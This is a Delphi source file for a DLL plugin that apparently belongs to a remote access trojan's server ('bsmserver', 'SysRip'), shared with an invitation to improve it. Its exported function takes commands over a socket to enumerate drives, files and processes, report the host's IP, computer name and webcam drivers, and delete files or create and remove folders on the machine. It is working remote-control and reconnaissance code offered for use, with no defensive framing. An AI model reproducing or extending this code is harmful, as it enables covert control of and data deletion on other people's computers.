{Thanks to LOM for basic plugin framework. I added the socket
so you can send data directly from the dll. Also thanks to
Akcom.
Feel free to make any improvements if need be.  I will
release your fixed version.}

library Manager;


{%File '..\..\Projects\nserver\bsmserver.dpr'}

uses
  Winsock,
  Classes,
  Windows,
  TlHelp32,
  untSysRip in '..\..\Projects\nserver\untSysRip.pas';

Var
tempstring: String;
sock:Tsocket;
hProcessEntry32: PROCESSENTRY32;
hSnapshot: dword;
wPid:dword;


const
cr_lf = chr(13) + chr(10);

function CapGetDriverDescription(wDriverIndex : word;
                                 lpszName : PChar;
                                 cbName : SmallInt;
                                 lpszVer : PChar;
                                 cbVer : SmallInt) : Bool  stdcall;
  external 'AVICAP32.DLL' name 'capGetDriverDescriptionA';


function StrPas(Str: PChar): string;
begin
  Result := Str;
end;


function inttostr(i:longint):string;
begin
str(i,result);
end;

procedure StrToStrList(Str, Del: String; var List: TStringList);
var
PosOfSlash: Integer;
begin
List.Clear;
While Length(Str) > 0 do
begin
PosOfSlash := Pos(Del, Str);
If PosOfSlash = 0 then PosOfSlash := length(Str) + 1;
List.Add(Copy(Str, 1, PosOfSlash - 1));

Str := Copy(Str, PosOfSlash + 1, length(Str) - PosOfSlash);
end;
end;

function CompName: string;
var
  buffer:array[0..MAX_COMPUTERNAME_LENGTH+1] of Char;
  length:Cardinal;
begin
   length:=MAX_COMPUTERNAME_LENGTH+1;
   GetComputerName(@buffer,length);
   CompName:=buffer;
end;

function GetDrives:pchar;
const typstr:array[DRIVE_REMOVABLE..DRIVE_RAMDISK] of string[9]=('Removable','Fixed','Network','CD-ROM','RAM');
var
 str:string;
 tmp,tmp2,tmp3,siz,siz2,siz3:int64;
 drive: Char;
 typ:integer;
begin
 for Drive := 'A' to 'Z' do
 begin
 typ:=getdrivetype(pchar(Drive+':\'));
  if typ> 1 then begin
  case GetDriveType(PChar(Drive + ':\')) of
   DRIVE_REMOVABLE:
   str:=str+'   '+Drive+': '+typstr[typ]+#10;
   DRIVE_FIXED:
   begin
    getdiskfreespaceex(pchar(Drive+':\'),tmp,tmp2,@tmp3);
    str:=str+'   '+Drive+': '+typstr[typ]+ ' Size: '+ inttostr(tmp2 div 1048576000)+' GB Free: '+inttostr(tmp3 div 1048576000)+' GB' +#10;
   end;
   DRIVE_REMOTE:
    str:=str+'   '+Drive+': '+typstr[typ]+#10;
   DRIVE_CDROM:
    begin
    getdiskfreespaceex(pchar(Drive+':\'),siz,siz2,@siz3);
    str:=str+'   '+Drive+': '+typstr[typ]+' Size: '+ inttostr(siz2 div 1048576000)+' GB Free: '+inttostr(siz3 div 1048576000)+' GB' +#10;;
   end;
   DRIVE_RAMDISK:
    str:=str+'   '+Drive+': '+typstr[typ]+#10;
    end;
 end;
end;
str:=str+#13;
result:=pchar(str);
end;

function GetProcesses:string;
var
list:string;

begin
hProcessEntry32.dwSize:=sizeof(hProcessEntry32) ;
hSnapshot:=CreateToolhelp32Snapshot( 2, 0);
if Process32First(hSnapshot, hProcessEntry32) then
begin
list:= list + hProcessEntry32.szExeFile +  inttostr(hProcessEntry32.th32ProcessID) + #10;
while Process32Next(hSnapshot,hProcessEntry32) do
list:= list + hProcessEntry32.szExeFile  +  '~' +   inttostr(hProcessEntry32.th32ProcessID) + #10;
end;
CloseHandle(hSnapshot);
list:= list + hProcessEntry32.szExeFile  + '~' +  inttostr(hProcessEntry32.th32ProcessID) + #13;
result:= list;
end;

function GetFiles(s_path:PChar):pchar;
var
i_loop:integer;
searc_rec:TSearchRec;
s_dirs,s_hidden,s_readonly,s_archive,s_system,s_files:string;
begin
try
i_loop := FindFirst(s_path + '*.*', faAnyFile, searc_rec);
while i_loop = 0 do
begin
if (searc_rec.Attr and fadirectory > 0) then appendstr(s_dirs,searc_rec.name + cr_lf);
if (searc_rec.Attr and faHidden > 0) then s_hidden := 'h' else s_hidden := '-';
if (searc_rec.Attr and faReadOnly > 0) then s_readonly := 'r' else s_readonly := '-';
if (searc_rec.Attr and faArchive > 0) then s_archive := 'a' else s_archive := '-';
if (searc_rec.Attr and faSysFile > 0) then s_system := 's' else s_system := '-';
if Not (searc_rec.Attr and faDirectory > 0) then  appendstr(s_files,searc_rec.name + '?' + inttostr(searc_rec.Size) + '' + s_readonly + s_hidden + s_archive + s_system + cr_lf);
i_loop := FindNext(searc_rec);
end;
except
raise;
end;
FindClose(searc_rec);
result := pchar(s_dirs + ':' + s_files);
end;

function GetIp: string;
type
TaPInAddr = array [0..10] of PInAddr;
PaPInAddr = ^TaPInAddr;
var
phe: PHostEnt;
pptr: PaPInAddr;
Buffer: array [0..63] of char;
GInitData: TWSADATA;
i:integer;
begin
WSAStartup($101, GInitData);
Result := '';
GetHostName(Buffer, SizeOf(Buffer));
phe :=GetHostByName(buffer);
if phe = nil then Exit;
pptr := PaPInAddr(Phe^.h_addr_list);
I := 0;
while pptr^[I] <> nil do begin
result:=StrPas(inet_ntoa(pptr^[I]^));
Inc(I);
end;
WSACleanup;
end;

//Gets Webcam version
function GetDrivers:string;
var
Name : array[0..255] of char;
Ver  : array[0..255] of char;
i    : integer;
begin
for i := 0 to 9 do
begin
 if CapGetDriverDescription(i, @name, 255, @ver, 255) then
  begin
  result:= GetIp + '*' + StrPas(Name) + StrPas(Ver);
  end else
  result:= 'info' + CompName + '\' + GetIp +'*' + 'none';
 end;
end;

Procedure del(Filepath:string);
begin
SetFileAttributes(pchar(Filepath),FILE_ATTRIBUTE_NORMAL);
sleep(100);
DeleteFile(pchar(FilePath));
end;

Procedure create(Filepath:string);
begin
createdirectory(pchar(filepath), nil);
end;

Procedure deldir(Filepath:string);
begin
removedirectory(pchar(FilePath));
end;


//function that communicates with main application
function Eng(sckt:TSocket;Strm: Pchar): Pchar; StdCall;
var
Lst: TStringList;
TmpPtr: String;
begin
Try
//swap the socket over to a variable.  We will use this same
//var name to send data back.
sock:= sckt;
//swap the data over in case the strm pointer gets cleared in shared mem

TmpPtr := String(Strm);
Strm := '';

//Create a string list
Lst := TStringList.Create;
//Split the list into section and give it an index
StrToStrList(TmpPtr, '*', Lst);

//FileManager example
//will add upload function for sending files later..
//messagebox(0,pchar(Lst.Strings[0]),'dll',0);
If Lst.Strings[0] = 'getdrives' then
{You can either send the data directly from the dll
or you can specify it as the result and the .exe will
send the result. }
//tempstring:='drvs' + GetDrives;
//Send(Sock, tempstring[1], Length(tempstring), 0);
begin
Result := pchar('drvs' + GetDrives);
end;

If Lst.Strings[0] = 'getfiles' then
Result := pchar('files' + Getfiles(pchar(Lst.Strings[1])));


{To display a message in the status bar in the Client
make it '1' + the data.}

If Lst.Strings[0] = 'del' then
begin
del(Lst.Strings[1]);
result:= '1' + 'File Deleted';
end;

If Lst.Strings[0] = 'fdel' then
begin
deldir(Lst.Strings[1]);
result:= '1' + 'Folder Removed';
end;

If Lst.Strings[0] = 'create' then
begin
create(Lst.Strings[1]);
result:= '1' + 'Folder Created';
end;

If Lst.Strings[0] = 'processes' then
begin
tempstring:='pids' +GetProcesses;
Send(Sock, tempstring[1], Length(tempstring), 0);
Result := Pchar('2' + 'pids*' + GetProcesses);
end;
//check for webcams

If Lst.Strings[0] = 'getdrivers' then
Result := Pchar(GetDrivers);



If Length(Result) = 0 then
Result := '1' + 'Parameter incorrect, or error';

Finally
TmpPtr := '';
FreeAndNil(Lst);
end;
end;


exports
Eng;

begin

end.
